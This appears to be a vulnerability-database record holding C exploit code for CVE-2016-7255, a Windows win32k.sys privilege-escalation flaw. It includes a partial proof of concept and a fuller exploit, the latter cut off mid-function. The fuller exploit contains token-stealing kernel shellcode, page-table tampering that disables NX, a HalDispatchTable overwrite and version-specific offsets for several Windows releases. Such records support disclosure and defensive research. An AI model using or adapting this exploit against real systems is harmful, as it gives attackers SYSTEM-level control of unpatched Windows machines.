(FALSE);\n\t \n\t return 0;\n}\n\n \n\n int _sim_alt_shift_tab(int nCount)\n {\n\t int i = 0;\n\t HWND hWnd = NULL;\n\n\n\t int nFinalRet = -1;\n\n\t do \n\t {\n\t\t _sim_key_down( VK_MENU );\n\t\t _sim_key_down( VK_SHIFT );\t \n\n\n\t\t for ( i = 0; i < nCount ; i++)\n\t\t {\n\t\t\t _sim_key_down( VK_TAB);\n\t\t\t _sim_key_up( VK_TAB);\n\t\t\t \n\t\t\t Sleep(1000);\n\n\t\t }\n\t\n\t\t \n\t\t_sim_key_up( VK_MENU );\n\t\t _sim_key_up( VK_SHIFT );\t \n\t } while (FALSE);\n\t \n\t return nFinalRet;\n}\n\n\n\nint or_address_value_4(__in void* pAddress)\n{\n\tWNDCLASSEXW stWC = {0};\n\n\tHWND\thWndParent = NULL;\n\tHWND\thWndChild = NULL;\n\n\tWCHAR*\tpszClassName = L\"cve-2016-7255\";\n\tWCHAR*\tpszTitleName = L\"cve-2016-7255\";\n\n\tvoid*\tpId = NULL;\n\tMSG\t\tstMsg = {0};\n\n\tdo \n\t{\n\n\t\tstWC.cbSize = sizeof(stWC);\n\t\tstWC.lpfnWndProc = DefWindowProcW;\n\t\tstWC.lpszClassName = pszClassName;\n\t\t\n\t\tif ( 0 == RegisterClassExW(&stWC) )\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\thWndParent = CreateWindowExW(\n\t\t\t0,\n\t\t\tpszClassName,\n\t\t\tNULL,\n\t\t\tWS_OVERLAPPEDWINDOW|WS_VISIBLE,\n\t\t\t0,\n\t\t\t0,\n\t\t\t360,\n\t\t\t360,\n\t\t\tNULL,\n\t\t\tNULL,\n\t\t\tGetModuleHandleW(NULL),\n\t\t\tNULL\n\t\t);\n\n\t\tif (NULL == hWndParent)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\thWndChild = CreateWindowExW(\n\t\t\t0,\n\t\t\tpszClassName,\n\t\t\tpszTitleName,\n\t\t\tWS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD,\n\t\t\t0,\n\t\t\t0,\n\t\t\t160,\n\t\t\t160,\n\t\t\thWndParent,\n\t\t\tNULL,\n\t\t\tGetModuleHandleW(NULL),\n\t\t\tNULL\n\t\t);\n\t\t\n\t\tif (NULL == hWndChild)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\t#ifdef _WIN64\n\t\t\tpId = ( (UCHAR*)pAddress - 0x28 ); \n\t\t#else\n\t\t\tpId = ( (UCHAR*)pAddress - 0x14); \n\t\t#endif // #ifdef _WIN64\n\t\t\n\t\tSetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId );\n\n\t\tDbgPrint(\"hWndChild = 0x%p\\n\" , hWndChild);\n\t\tDebugBreak();\n\n\t\tShowWindow(hWndParent , SW_SHOWNORMAL);\n\n\t\tSetParent(hWndChild , GetDesktopWindow() );\n\n\t\tSetForegroundWindow(hWndChild);\n\n\t\t_sim_alt_shift_tab(4);\n\t\t\n\t\tSwitchToThisWindow(hWndChild , TRUE);\n\t\t\n\t\t_sim_alt_shift_esc();\n\n\n\t\twhile( GetMessage(&stMsg , NULL , 0 , 0) )\n\t\t{\t\n\t\t\tTranslateMessage(&stMsg);\n\t\t\tDispatchMessage(&stMsg);\n\t\t}\n\t\n\n\t} while (FALSE);\n\n\tif ( NULL != hWndParent )\n\t{\n\t\tDestroyWindow(hWndParent);\n\t\thWndParent = NULL;\n\t}\n\n\tif ( NULL != hWndChild )\n\t{\n\t\tDestroyWindow(hWndChild);\n\t\thWndChild = NULL;\n\t}\n\n\tUnregisterClassW(pszClassName , GetModuleHandleW(NULL) );\n\n\treturn 0;\n}\n\nint __cdecl wmain(int nArgc, WCHAR** Argv)\n{\n\tdo \n\t{\n\t\tor_address_value_4( (void*)0xFFFFFFFF );\n\t} while (FALSE);\n\t\n\treturn 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2017-01-12T02:03:22", "description": "", "published": "2017-01-12T00:00:00", "type": "packetstorm", "title": "Microsoft Windows Kernel win32k.sys NtSetWindowLongPtr Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7255"], "modified": "2017-01-12T00:00:00", "id": "PACKETSTORM:140468", "href": "https://packetstormsecurity.com/files/140468/Microsoft-Windows-Kernel-win32k.sys-NtSetWindowLongPtr-Privilege-Escalation.html", "sourceData": "`// ricklarabee.blogspot.com \n \n//This program is free software; you can redistribute it and/or \n//modify it under the terms of the GNU General Public License \n//as published by the Free Software Foundation. \n \n//This program is distributed in the hope that it will be useful, \n//but WITHOUT ANY WARRANTY; without even the implied warranty of \n//MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the \n//GNU General Public License for more details. \n \n//You should have received a copy of the GNU General Public License \n//along with this program; if not, write to the Free Software \n//Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. \n \n// Credits: enrique.nissim@IOActive.com: https://github.com/IOActive/I-know-where-your-page-lives/tree/master/code/CVE-2016-7255 \n// PoC from https://github.com/tinysec/public/tree/master/CVE-2016-7255 \n \n#include <windows.h> \n#include <wchar.h> \n#include <stdlib.h> \n#include <stdio.h> \n \n#pragma comment(lib,\"ntdll.lib\") \n#pragma comment(lib,\"user32.lib\") \n#pragma comment(lib, \"advapi32\") \n \nUINT64 PML4_BASE; \nUINT PML4_SELF_REF_INDEX; \nUINT64 PML4_SELF_REF = 0xFFFFF6FB7DBEDF68; \n \n#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) \n#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L) \n#define GET_INDEX(va) ( ((va >> 39) & 0x1ff )) \n \n//////////////////////////////////////////////////////// \n// Define Data Types \n//////////////////////////////////////////////////////// \ntypedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { \nPVOID Unknown1; \nPVOID Unknown2; \nPVOID Base; \nULONG Size; \nULONG Flags; \nUSHORT Index; \nUSHORT NameLength; \nUSHORT LoadCount; \nUSHORT PathLength; \nCHAR ImageName[256]; \n} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; \n \ntypedef struct _SYSTEM_MODULE_INFORMATION { \nULONG Count; \nSYSTEM_MODULE_INFORMATION_ENTRY Module[1]; \n} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; \n \ntypedef enum _SYSTEM_INFORMATION_CLASS { \nSystemModuleInformation = 11, \nSystemHandleInformation = 16 \n} SYSTEM_INFORMATION_CLASS; \n \ntypedef NTSTATUS (WINAPI *NtQuerySystemInformation_t)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass, \nOUT PVOID SystemInformation, \nIN ULONG SystemInformationLength, \nOUT PULONG ReturnLength); \n \ntypedef NTSTATUS (WINAPI *NtQueryIntervalProfile_t)(IN ULONG ProfileSource, \nOUT PULONG Interval); \n \nNtQuerySystemInformation_t NtQuerySystemInformation; \nNtQueryIntervalProfile_t NtQueryIntervalProfile; \n \nchar shellcode[] = { \n//0xcc, \n0xfa, // CLI \n0x9c, // PUSHFQ \n0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RAX, Original Pointer \n0x50, // PUSH RAX \n0x51, // PUSH RCX \n0x48, 0xb9, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RCX, [OverwriteAddr+OverwriteOffset] \n0x48, 0x89, 0x01, // MOV QWORD PTR [RCX], RAX \n0xb9, 0x90, 0x90, 0x90, 0x90, // MOV ECX, PID \n0x53, // PUSH RBX \n \n0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, // MOV RAX,QWORD PTR gs:0x188 \n0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // MOV RAX,QWORD PTR [RAX+0xb8] EPROCESS \n0x48, 0x8d, 0x80, 0x90, 0x90, 0x00, 0x00, // LEA RAX,[RAX+0xActiveProcessLinkOffset] \n//<tag> \n0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX] \n0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID \n0x48, 0x83, 0xfb, 0x04, // CMP RBX,0x4 \n0x75, 0xf3, // JNE <tag> \n0x48, 0x8b, 0x98, 0x90, 0x90, 0x90, 0x90, // MOV RBX, QWORD PTR [RAX+0x60] // GET TOKEN of SYSTEM \n \n0x53, // PUSH RBX \n//<tag2> \n0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX] \n0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID \n0x39, 0xcb, // CMP EBX, ECX // our PID \n0x75, 0xf5, // JNE <tag2> \n0x5b, // POP RBX \n0x48, 0x89, 0x98, 0x90, 0x90, 0x90, 0x90, // MOV QWORD PTR[RAX + 0x60], RBX \n \n0x5b, // POP RBX \n0x59, // POP RCX \n0x58, // POP RAX \n0x9d, // POPFQ \n \n0xfb, // STI \n0xff, 0xe0 // JMP RAX \n}; \n \nULONG __cdecl DbgPrint(__in char* Format, ...) \n{ \nCHAR* pszDbgBuff = NULL; \nva_list VaList = NULL; \nULONG ulRet = 0; \n \ndo \n{ \npszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0, 1024 * sizeof(CHAR)); \nif (NULL == pszDbgBuff) \n{ \nbreak; \n} \nRtlZeroMemory(pszDbgBuff, 1024 * sizeof(CHAR)); \n \nva_start(VaList, Format); \n \n_vsnprintf((CHAR*)pszDbgBuff, 1024 - 1, Format, VaList); \n \n \nOutputDebugStringA(pszDbgBuff); \n \nva_end(VaList); \n \n} while (FALSE); \n \nif (NULL != pszDbgBuff) \n{ \nHeapFree(GetProcessHeap(), 0, pszDbgBuff); \npszDbgBuff = NULL; \n} \n \nreturn ulRet; \n} \n \n \nint _sim_key_down(WORD wKey) \n{ \nINPUT stInput = { 0 }; \n \ndo \n{ \nstInput.type = INPUT_KEYBOARD; \nstInput.ki.wVk = wKey; \nstInput.ki.dwFlags = 0; \n \nSendInput(1, &stInput, sizeof(stInput)); \n \n} while (FALSE); \n \nreturn 0; \n} \n \nint _sim_key_up(WORD wKey) \n{ \nINPUT stInput = { 0 }; \n \ndo \n{ \nstInput.type = INPUT_KEYBOARD; \nstInput.ki.wVk = wKey; \nstInput.ki.dwFlags = KEYEVENTF_KEYUP; \n \nSendInput(1, &stInput, sizeof(stInput)); \n \n} while (FALSE); \n \nreturn 0; \n} \n \nint _sim_alt_shift_esc() \n{ \nint i = 0; \n \ndo \n{ \n_sim_key_down(VK_MENU); \n_sim_key_down(VK_SHIFT); \n \n \n_sim_key_down(VK_ESCAPE); \n_sim_key_up(VK_ESCAPE); \n \n_sim_key_down(VK_ESCAPE); \n_sim_key_up(VK_ESCAPE); \n \n_sim_key_up(VK_MENU); \n_sim_key_up(VK_SHIFT); \n \n \n} while (FALSE); \n \nreturn 0; \n} \n \n \n \nint _sim_alt_shift_tab(int nCount) \n{ \nint i = 0; \nHWND hWnd = NULL; \n \n \nint nFinalRet = -1; \n \ndo \n{ \n_sim_key_down(VK_MENU); \n_sim_key_down(VK_SHIFT); \n \n \nfor (i = 0; i < nCount; i++) \n{ \n_sim_key_down(VK_TAB); \n_sim_key_up(VK_TAB); \n \nSleep(1000); \n \n} \n \n \n_sim_key_up(VK_MENU); \n_sim_key_up(VK_SHIFT); \n} while (FALSE); \n \nreturn nFinalRet; \n} \n \nint _sim_alt_esc(int count) \n{ \nint i = 0; \n \nfor (i = 0; i<count; i++) \n{ \n_sim_key_down(VK_MENU); \n//_sim_key_down(VK_SHIFT); \n \n \n_sim_key_down(VK_ESCAPE); \n_sim_key_up(VK_ESCAPE); \n \n_sim_key_down(VK_ESCAPE); \n_sim_key_up(VK_ESCAPE); \n \n_sim_key_up(VK_MENU); \n//_sim_key_up(VK_SHIFT); \n \n} \n \nreturn 0; \n} \n \n \nint or_address_value_4(__in void* pAddress) \n{ \nWNDCLASSEXW stWC = { 0 }; \n \nHWND hWndParent = NULL; \nHWND hWndChild = NULL; \n \nWCHAR* pszClassName = L\"cve-2016-7255\"; \nWCHAR* pszTitleName = L\"cve-2016-7255\"; \n \nvoid* pId = NULL; \nMSG stMsg = { 0 }; \n \nUINT64 value = 0; \n \ndo \n{ \n \nstWC.cbSize = sizeof(stWC); \nstWC.lpfnWndProc = DefWindowProcW; \nstWC.lpszClassName = pszClassName; \n \nif (0 == RegisterClassExW(&stWC)) \n{ \nbreak; \n} \n \nhWndParent = CreateWindowExW( \n0, \npszClassName, \nNULL, \nWS_OVERLAPPEDWINDOW | WS_VISIBLE, \n0, \n0, \n360, \n360, \nNULL, \nNULL, \nGetModuleHandleW(NULL), \nNULL \n); \n \nif (NULL == hWndParent) \n{ \nbreak; \n} \n \nhWndChild = CreateWindowExW( \n0, \npszClassName, \npszTitleName, \nWS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD, \n0, \n0, \n160, \n160, \nhWndParent, \nNULL, \nGetModuleHandleW(NULL), \nNULL \n); \n \nif (NULL == hWndChild) \n{ \nbreak; \n} \n \n#ifdef _WIN64 \npId = ((UCHAR*)pAddress - 0x28); \n#else \npId = ((UCHAR*)pAddress - 0x14); \n#endif // #ifdef _WIN64 \n \nSetWindowLongPtr(hWndChild, GWLP_ID, (LONG_PTR)pId); \n \nDbgPrint(\"hWndChild = 0x%p\\n\", hWndChild); \n \nShowWindow(hWndParent, SW_SHOWNORMAL); \n \nSetParent(hWndChild, GetDesktopWindow()); \n \nSetForegroundWindow(hWndChild); \n \n_sim_alt_shift_tab(4); \n \nSwitchToThisWindow(hWndChild, TRUE); \n \n_sim_alt_shift_esc(); \n \nwhile (GetMessage(&stMsg, NULL, 0, 0)) { \n \nSetFocus(hWndParent); \n_sim_alt_esc(20); \nSetFocus(hWndChild); \n_sim_alt_esc(20); \n \nTranslateMessage(&stMsg); \nDispatchMessage(&stMsg); \n \nif (value != 0) { \nbreak; \n} \n \n \n__try { \nvalue = *(UINT64 *)PML4_SELF_REF; \nif ((value & 0x67) == 0x67) { \nprintf(\"Value Self Ref = %llx\\n\", value); \nbreak; \n} \n} \n__except (EXCEPTION_EXECUTE_HANDLER) { \ncontinue; \n} \n \n} \n \n \n} while (FALSE); \n \nif (NULL != hWndParent) \n{ \nDestroyWindow(hWndParent); \nhWndParent = NULL; \n} \n \nif (NULL != hWndChild) \n{ \nDestroyWindow(hWndChild); \nhWndChild = NULL; \n} \n \nUnregisterClassW(pszClassName, GetModuleHandleW(NULL)); \n \nreturn 0; \n} \n \nUINT64 get_pxe_address(UINT64 address) { \nUINT entry = PML4_SELF_REF_INDEX; \nUINT64 result = address >> 9; \nUINT64 lower_boundary = ((UINT64)0xFFFF << 48) | ((UINT64)entry << 39); \nUINT64 upper_boundary = (((UINT64)0xFFFF << 48) | ((UINT64)entry << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8; \nresult = result | lower_boundary; \nresult = result & upper_boundary; \nreturn result; \n} \n \nUINT64 look_free_entry_pml4(void) { \n// Looks for a free pml4e in the last 0x100 bytes of the PML4 \nint offset = 0xF00; \nUINT64 pml4_search = PML4_BASE + offset; \nwhile (offset < 0xFF8) \n{ \nif ((*(PVOID *)pml4_search) == 0x0) \n{ \n// This is a NULL (free) entry \nbreak; \n} \noffset += 8; \npml4_search = PML4_BASE + offset; \n} \nreturn pml4_search; \n} \n \nUINT64 calculate_spurious_pt_address(UINT64 spurious_offset) { \nUINT64 index = (spurious_offset & 0xFFF) / 8; \nUINT64 result = ( \n((UINT64)0xFFFF << 48) | \n((UINT64)PML4_SELF_REF_INDEX << 39) | \n((UINT64)PML4_SELF_REF_INDEX << 30) | \n((UINT64)PML4_SELF_REF_INDEX << 21) | \n(index << 12) \n); \nreturn result; \n} \n \n \n \nUINT64 create_spurious_pte_to_virtual_address(UINT64 virtual_address, BOOL patch_original) { \n \n/* \n1: kd> !pte ffffffff`ffd00000 \nVA ffffffffffd00000 \nPXE at FFFFF6FB7DBEDFF8 PPE at FFFFF6FB7DBFFFF8 PDE at FFFFF6FB7FFFFFF0 PTE at FFFFF6FFFFFFE800 \ncontains 0000000000A1F063 contains 0000000000A20063 contains 0000000000A25063 contains 8000000000103963 \npfn a1f-- - DA--KWEV pfn a20-- - DA--KWEV pfn a25-- - DA--KWEV pfn 103 - G - DA--KW - V \n*/ \n \nUINT64 pte = get_pxe_address(virtual_address); \nint pte_offset = pte & 0xFFF; \n//printf(\"PTE: %llx, %x\\n\", pte, pte_offset); \n \nUINT64 pde = get_pxe_address(pte); \nint pde_offset = pde & 0xFFF; \n//printf(\"PDE: %llx, %x\\n\", pde, pde_offset); \n \nUINT64 pdpte = get_pxe_address(pde); \nint pdpte_offset = pdpte & 0xFFF; \n//printf(\"PDPTE: %llx,%x\\n\", pdpte, pdpte_offset); \n \nUINT64 pml4e = get_pxe_address(pdpte); \nint pml4e_offset = pml4e & 0xFFF; \n//printf(\"PML4E: %llx\\n\", pml4e, pml4e_offset); \n \nUINT64 spurious_offset = look_free_entry_pml4(); \nprintf(\"[+] Selected spurious PML4E: %llx\\n\", spurious_offset); \nUINT64 f_e_pml4 = spurious_offset; \nUINT64 spurious_pt = calculate_spurious_pt_address(spurious_offset); \nprintf(\"[+] Spurious PT: %llx\\n\", spurious_pt); \nprintf(\"--------------------------------------------------\\n\\n\"); \n \n \n//Read the physical address of pml4e \nUINT64 pml4e_pfn = (UINT64)(*(PVOID *)pml4e); \nprintf(\"[+] Content pml4e %llx: %llx\\n\", pml4e, pml4e_pfn); \n// Change the PxE \npml4e_pfn = pml4e_pfn | 0x67; // Set U/S \n \nprintf(\"[+] Patching the Spurious Offset (PML4e) %llx: %llx\\n\",f_e_pml4, pml4e_pfn); \n*((PVOID *)spurious_offset) = (PVOID)pml4e_pfn; \nSleep(0x1); // Sleep for TLB refresh; \n \n//Read the physical address of pdpte \nUINT64 pdpte_pfn = (UINT64) *(PVOID *)(spurious_pt + pdpte_offset); \nprintf(\"[+] Content pdpte %llx: %llx\\n\", pdpte, pdpte_pfn); \n// Change the PxE \npdpte_pfn = pdpte_pfn | 0x67; // Set U/S \nprintf(\"[+] Patching the Spurious Offset (PDPTE) %llx: %llx\\n\", spurious_offset, pdpte_pfn); \n*((PVOID *)spurious_offset) = (PVOID)pdpte_pfn; \nSleep(0x1); // Sleep for TLB refresh; \n \n//Read the physical address of pde \nUINT64 pde_addr = spurious_pt + pde_offset; \nUINT64 pde_pfn = (UINT64) *(PVOID *)(spurious_pt + pde_offset); \nprintf(\"[+] Content pdpe %llx: %llx\\n\", pde, pde_pfn); \n// Change the PxE \npde_pfn = pde_pfn | 0x67; // Set U/S \nprintf(\"[+] Patching the Spurious Offset (PDE) %llx: %llx\\n\", spurious_offset, pde_pfn); \n*((PVOID *)spurious_offset) = (PVOID)pde_pfn; \nSleep(0x1); // Sleep for TLB refresh; \n \n//Read the physical address of pte \nUINT64 pte_addr = spurious_pt + pte_offset; \nUINT64 pte_pfn = (UINT64) *(PVOID *)(spurious_pt + pte_offset); \nprintf(\"[+] Content pte %llx: %llx\\n\", pte, pte_pfn); \n// Change the PxE \npte_pfn = pte_pfn | 0x67; // Set U/S \npte_pfn = pte_pfn & 0x7fffffffffffffff; // Turn off NX \nif (patch_original) { \nprintf(\"*** Patching the original location to enable NX...\\n\"); \n*(PVOID *)(spurious_pt + pte_offset) = (PVOID)pte_pfn; \n} \n \nprintf(\"[+] Patching the Spurious Offset (PTE) %llx: %llx\\n\", spurious_offset, pte_pfn); \n*((PVOID *)spurious_offset) = (PVOID)pte_pfn; \nSleep(0x1); // Sleep for TLB refresh; \nprintf(\"\\n\\n\"); \nreturn spurious_pt; \n} \n \nUINT64 get_OverwriteAddress_pointer(UINT64 target_address, int target_offset) { \nprintf(\"[*] Getting Overwrite pointer: %llx\\n\", target_address); \nUINT64 OverwriteAddress = create_spurious_pte_to_virtual_address(target_address, FALSE); \nOverwriteAddress += (target_address & 0xFFF); \nprintf(\"OverwriteAddress: %llx\\n\", OverwriteAddress); \nreturn (UINT64) *((PVOID *)(((char *)OverwriteAddress) + target_offset)); \n} \n \nvoid overwrite_TargetAddress(UINT64 hook_address, UINT64 target_address, int target_offset) { \nUINT64 OverwriteTarget = create_spurious_pte_to_virtual_address(target_address, FALSE); \nOverwriteTarget += (target_address & 0xFFF); \nUINT64 target = (UINT64)((char *)OverwriteTarget) + target_offset; \nprintf(\"Patch OverwriteTarget: %llx with %llx\\n\", target, hook_address); \n*(PVOID *)target = (PVOID)hook_address; \n} \n \n \nUINT64 store_shellcode_in_hal(void) { \n//// Finally store the shellcode on the HAL \n \nUINT64 hal_heap_addr = 0xFFFFFFFFFFD00000; \nUINT64 hal_heap = create_spurious_pte_to_virtual_address(hal_heap_addr, TRUE); \n \nprintf(\"HAL address: %llx\\n\", hal_heap); \n// 0xffffffffffd00d50 this is a good offset to store shellcode \n// 0xfff - 0xd50 = 0x2af space \n \nmemcpy(((char *)hal_heap) + 0xd50, shellcode, sizeof(shellcode)); \nreturn 0xffffffffffd00d50; \n} \n \nUINT64 GetHalDispatchTable() { \nPCHAR KernelImage; \nSIZE_T ReturnLength; \nHMODULE hNtDll = NULL; \nUINT64 HalDispatchTable; \nHMODULE hKernelInUserMode = NULL; \nPVOID KernelBaseAddressInKernelMode; \nNTSTATUS NtStatus = STATUS_UNSUCCESSFUL; \nPSYSTEM_MODULE_INFORMATION pSystemModuleInformation; \n \nhNtDll = LoadLibrary(\"ntdll.dll\"); \n \nif (!hNtDll) { \nprintf(\"\\t\\t\\t[-] Failed To Load NtDll.dll: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \n \nNtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, \"NtQuerySystemInformation\"); \n \nif (!NtQuerySystemInformation) { \nprintf(\"\\t\\t\\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \n \nNtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength); \n \n// Allocate the Heap chunk \npSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(), \nHEAP_ZERO_MEMORY, \nReturnLength); \n \nif (!pSystemModuleInformation) { \nprintf(\"\\t\\t\\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \nNtStatus = NtQuerySystemInformation(SystemModuleInformation, \npSystemModuleInformation, \nReturnLength, \n&ReturnLength); \n \nif (NtStatus != STATUS_SUCCESS) { \nprintf(\"\\t\\t\\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \n \nKernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base; \nKernelImage = strrchr((PCHAR)(pSystemModuleInformation->Module[0].ImageName), '\\\\') + 1; \n \nprintf(\"\\t\\t\\t[+] Loaded Kernel: %s\\n\", KernelImage); \nprintf(\"\\t\\t\\t[+] Kernel Base Address: 0x%p\\n\", KernelBaseAddressInKernelMode); \n \nhKernelInUserMode = LoadLibraryA(KernelImage); \n \nif (!hKernelInUserMode) { \nprintf(\"\\t\\t\\t[-] Failed To Load Kernel: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \n \n// This is still in user mode \nHalDispatchTable = (UINT64)GetProcAddress(hKernelInUserMode, \"HalDispatchTable\"); \n \nif (!HalDispatchTable) { \nprintf(\"\\t\\t\\t[-] Failed Resolving HalDispatchTable: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \nelse { \nHalDispatchTable = (ULONGLONG)HalDispatchTable - (ULONGLONG)hKernelInUserMode; \n \n// Here we get the address of HapDispatchTable in Kernel mode \nHalDispatchTable = ((ULONGLONG)HalDispatchTable + (ULONGLONG)KernelBaseAddressInKernelMode); \nprintf(\"\\t\\t\\t[+] HalDispatchTable: 0x%llx\\n\", HalDispatchTable); \n} \n \nHeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation); \n \nif (hNtDll) { \nFreeLibrary(hNtDll); \n} \n \nif (hKernelInUserMode) { \nFreeLibrary(hKernelInUserMode); \n} \n \nhNtDll = NULL; \nhKernelInUserMode = NULL; \npSystemModuleInformation = NULL; \n \nreturn HalDispatchTable; \n} \n \nint __cdecl main(int argc, char** argv) \n{ \nTCHAR pre_username[256]; \nTCHAR post_username[256]; \nDWORD size = 256; \nULONG Interval = 0; \nHMODULE hNtDll = NULL; \nUINT retval; \nUINT64 overwrite_address; \nint overwrite_offset; \n \n// define operating system version specific variables \nunsigned char sc_KPROCESS; \nunsigned int sc_TOKEN; \nunsigned int sc_APLINKS; \nint osversion; \n \nif (argc != 2) { \nprintf(\"Please enter an OS version\\n\"); \nprintf(\"The following OS'es are supported:\\n\"); \nprintf(\"\\t[*] 7 - Windows 7\\n\"); \nprintf(\"\\t[*] 81 - Windows 8.1\\n\"); \nprintf(\"\\t[*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)\\n\"); \nprintf(\"\\t[*] 12 - Windows 2012 R2\\n\"); \nprintf(\"\\n\"); \nprintf(\"\\t[*] For example: cve-2016-7255.exe 7 -- for Windows 7\\n\"); \nreturn -1; \n} \n \nosversion = _strtoui64(argv[1], NULL, 10); \n \nif(osversion == 7) \n{ \n// the target machine's OS is Windows 7 SP1 \nprintf(\" [+] Windows 7 SP1\\n\"); \nsc_KPROCESS = 0x70; // dt -r1 nt!_KTHREAD +0x050 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS \nsc_TOKEN = 0x80; // dt -r1 nt!_EPROCESS [+0x208 Token : _EX_FAST_REF] - [+0x188 ActiveProcessLinks : _LIST_ENTRY] = (0x80) \nsc_APLINKS = 0x188; // dt -r1 nt!_EPROCESS +0x188 ActiveProcessLinks : _LIST_ENTRY \n \noverwrite_address = GetHalDispatchTable(); // HalDispatchTable \noverwrite_offset = 0x8; // QueryIntervalProfile \n} \nelse if(osversion == 81) \n{ \n// the target machine's OS is Windows 8.1 \nprintf(\" [+] Windows 8.1\\n\"); \nsc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS \nsc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60) \nsc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY \n \noverwrite_address = 0xffffffffffd00510; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)) \noverwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt) \n} \nelse if(osversion == 10) \n{ \n// the target machine's OS is Windows 10 prior to build 14393 \nprintf(\" [+] Windows 10\\n\"); \nsc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS \nsc_TOKEN = 0x68; // dt -r1 nt!_EPROCESS [+0x358 Token : _EX_FAST_REF] - [+0x2f0 ActiveProcessLinks : _LIST_ENTRY] = (0x60) \nsc_APLINKS = 0x2f0; // dt -r1 nt!_EPROCESS +0x2f0 ActiveProcessLinks : _LIST_ENTRY \n \noverwrite_address = 0xffffffffffd004c0; // HalpInterruptController_address (dq poi(hal!HalpInterruptController) \noverwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt) \n} \nelse if(osversion == 12) \n{ \n// the target machine's OS is Windows 2012 R2 \nprintf(\" [+] Windows 2012 R2\\n\"); \nsc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS \nsc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60) \nsc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY \n \noverwrite_address = 0xffffffffffd12c70; // HalpInterruptController_address (dq poi(hal!HalpInterruptController) \noverwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt) \n} \n// in case the OS version is not any of the previously checked versions \nelse \n{ \nprintf(\" [-] Unsupported version\\n\"); \nprintf(\" [*] Affected 64-bit operating systems\\n\"); \nprintf(\" [*] Windows 7 SP1 -- cve-2016-7255.exe 7\\n\"); \nprintf(\" [*] Windows 8.1 -- cve-2016-7255.exe 81\\n\"); \nprintf(\" [*] Windows 10 before build 14393 -- cve-2016-7255.exe 10\\n\"); \nprintf(\" [*] Windows 2012 R2 -- cve-2016-7255.exe 12\\n\"); \nreturn -1; \n} \n \nprintf(\"My PID is: %d\\n\", GetCurrentProcessId()); \nGetUserName(pre_username, &size); \nprintf(\"Current Username: %s\\n\", pre_username); \nprintf(\"PML4 Self Ref: %llx\\n\", PML4_SELF_REF); \nprintf(\"Shellcode stored at: %p\\n\", (void *) &shellcode); \nprintf(\"Enter to continue...\\n\"); \ngetchar(); \n \ndo \n{ \nor_address_value_4((void*)PML4_SELF_REF); \n} while (FALSE); \n \nPML4_SELF_REF_INDEX = GET_INDEX((UINT64)PML4_SELF_REF); 